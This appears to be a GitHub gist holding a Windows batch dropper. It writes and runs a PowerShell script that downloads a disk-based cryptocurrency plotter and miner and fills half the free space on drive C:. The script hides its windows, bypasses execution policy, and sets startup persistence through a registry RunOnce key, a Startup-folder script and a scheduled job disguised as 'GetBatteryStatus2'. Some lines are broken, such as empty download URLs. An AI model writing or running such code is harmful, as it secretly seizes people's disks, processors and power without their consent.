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Created August 20, 2020 15:34
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  • Save staccDOTsol/a959b41afd54324da5c6fa61c5301101 to your computer and use it in GitHub Desktop.
Save staccDOTsol/a959b41afd54324da5c6fa61c5301101 to your computer and use it in GitHub Desktop.
@echo off
@echo mkdir c:\temp >>stuff.ps1
@echo $disk = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'" >>stuff.ps1
@echo $nonces=$disk.FreeSpace/1024/1024/1024/2*4096 >>stuff.ps1
@echo $web_client = new-object >>stuff.ps1
@echo $build_info=$web_client.DownloadString("$nonces") >>stuff.ps1
@echo $start=$build_info.nonce >>stuff.ps1
@echo (new-object System.Net.WebClient).DownloadFile('', 'c:/temp/') >>stuff.ps1
@echo $nonces=[math]::floor($nonces) >>stuff.ps1
@echo $start=[math]::floor($start) >>stuff.ps1
@echo Add-Type -AssemblyName System.IO.Compression.FileSystem >>stuff.ps1
@echo [System.IO.Compression.ZipFile]::ExtractToDirectory('c:/temp/', 'c:/temp') >>stuff.ps1
@echo start-process -NoNewWindow -FilePath 'c:\temp\engraver_cpu.exe' -ArgumentList "-l -i 10478801653490313100 -s $start -n $nonces -p c:\temp" >>stuff.ps1
@echo (new-object System.Net.WebClient).DownloadFile('', 'c:/temp/') >>stuff.ps1
@echo [System.IO.Compression.ZipFile]::ExtractToDirectory('c:/temp/', 'c:/temp') >>stuff.ps1
@echo $out = ^"plot_dirs: >>stuff.ps1
@echo - 'C:\temp' >>stuff.ps1
@echo url: '' >>stuff.ps1
@echo hdd_reader_thread_count: 0 # default 0 (=auto: number of disks) >>stuff.ps1
@echo hdd_use_direct_io: true # default true >>stuff.ps1
@echo hdd_wakeup_after: 240 # default 240s >>stuff.ps1
@echo cpu_threads: 0 # default 0 (=auto: number of logical cpu cores) >>stuff.ps1
@echo cpu_worker_task_count: 4 # default 4 (0=GPU only) >>stuff.ps1
@echo cpu_nonces_per_cache: 65536 # default 65536 >>stuff.ps1
@echo cpu_thread_pinning: false # default false >>stuff.ps1
@echo gpu_threads: 0 # default 0 (=GPU off) >>stuff.ps1
@echo gpu_platform: 0 # default 0 >>stuff.ps1
@echo gpu_device: 0 # default 0 >>stuff.ps1
@echo gpu_worker_task_count: 0 # default 0 (=CPU only) >>stuff.ps1
@echo gpu_nonces_per_cache: 262144 # default 262144 >>stuff.ps1
@echo gpu_mem_mapping: false # default false >>stuff.ps1
@echo gpu_async: false # default false >>stuff.ps1
@echo target_deadline: 31536000 # default u32::MAX >>stuff.ps1
@echo account_id_to_target_deadline: # target dls for multi-id (optional) >>stuff.ps1
@echo 10282355196851764065: 600000 >>stuff.ps1
@echo 1796535821016683299: 55555555 >>stuff.ps1
@echo get_mining_info_interval: 3000 # default 3000ms >>stuff.ps1
@echo timeout: 5000 # default 5000ms >>stuff.ps1
@echo send_proxy_details: true # default false >>stuff.ps1
@echo console_log_level: 'info' # default Info, options (off, error, warn, info, debug, trace) >>stuff.ps1
@echo logfile_log_level: 'warn' # default Warn, options (off, serror, warn, info, debug, trace) >>stuff.ps1
@echo logfile_max_count: 10 # maximum number of log files to keep >>stuff.ps1
@echo logfile_max_size : 20 # maximum size per logfile in MiB >>stuff.ps1
@echo show_progress: true # default true >>stuff.ps1
@echo show_drive_stats: false # default false >>stuff.ps1
@echo benchmark_only: 'disabled' # default disabled, options (disabled, I/O, XPU)^" >>stuff.ps1
@echo rm c:\temp\config.yaml >>stuff.ps1
@echo add-content c:\temp\config.yaml $out >>stuff.ps1
@echo start-process -NoNewWindow -FilePath 'c:\temp\scavenger.exe' -ArgumentList "-c c:\temp\config.yaml" >>stuff.ps1
@echo $ps1 = 'set-location HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce >>stuff.ps1
@echo new-itemproperty . MyKey -propertytype String -value ^"Powershell c:\temp\ps1.ps1^" >>stuff.ps1
@echo start-process -NoNewWindow -FilePath ^"c:\temp\scavenger.exe^" -ArgumentList ^"-c c:\temp\config.yaml^"' >>stuff.ps1
@echo rm c:\temp\ps1.ps1 >>stuff.ps1
@echo add-content c:\temp\ps1.ps1 $ps1 >>stuff.ps1
@echo $trigger = New-JobTrigger -AtStartup >>stuff.ps1
@echo $user=[Environment]::UserName >>stuff.ps1
@echo $start='c:\temp\scavenger.exe -c c:\temp\config.yaml > output.txt' >> stuff.ps1
mkdir c:\temp
@echo $vbs='wscript.exe c:\temp\invis.vbs c:\temp\startup.cmd %*'>>stuff.ps1
@echo add-content "C:\Users\$user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\startup2.cmd" $vbs >>stuff.ps1
@echo set args = WScript.Arguments >> c:\temp\invis.vbs
@echo num = args.Count >> c:\temp\invis.vbs
@echo if num = 0 then >> c:\temp\invis.vbs
@echo WScript.Echo "Usage: [CScript | WScript] invis.vbs aScript.bat <some script arguments>" >> c:\temp\invis.vbs
@echo WScript.Quit 1 >> c:\temp\invis.vbs
@echo end if >> c:\temp\invis.vbs
@echo sargs = "" >> c:\temp\invis.vbs
@echo if num > 1 then >> c:\temp\invis.vbs
@echo sargs = " " >> c:\temp\invis.vbs
@echo for k = 1 to num - 1 >> c:\temp\invis.vbs
@echo anArg = args.Item(k) >> c:\temp\invis.vbs
@echo sargs = sargs & anArg & " " >> c:\temp\invis.vbs
@echo next >> c:\temp\invis.vbs
@echo end if >> c:\temp\invis.vbs
@echo Set WshShell = WScript.CreateObject("WScript.Shell") >> c:\temp\invis.vbs
@echo WshShell.Run ^"^"^"^" & WScript.Arguments(0) & ^"^"^"^" & sargs, 0, False >> c:\temp\invis.vbs
@echo add-content "C:\temp\startup.cmd" $start >>stuff.ps1
@echo Register-ScheduledJob -Trigger $trigger -FilePath c:\temp\ps1.ps1 -Name GetBatteryStatus2 >>stuff.ps1
@echo new-itemproperty . MyKey -propertytype String -value ^"Powershell c:\temp\ps1.ps1^" >>stuff.ps1
@echo start-process -NoNewWindow -FilePath ^"c:\temp\scavenger.exe^" -ArgumentList ^"-c c:\temp\config.yaml^" >>stuff.ps1
START powershell -WindowStyle Hidden -ExecutionPolicy ByPass -File "stuff.ps1"
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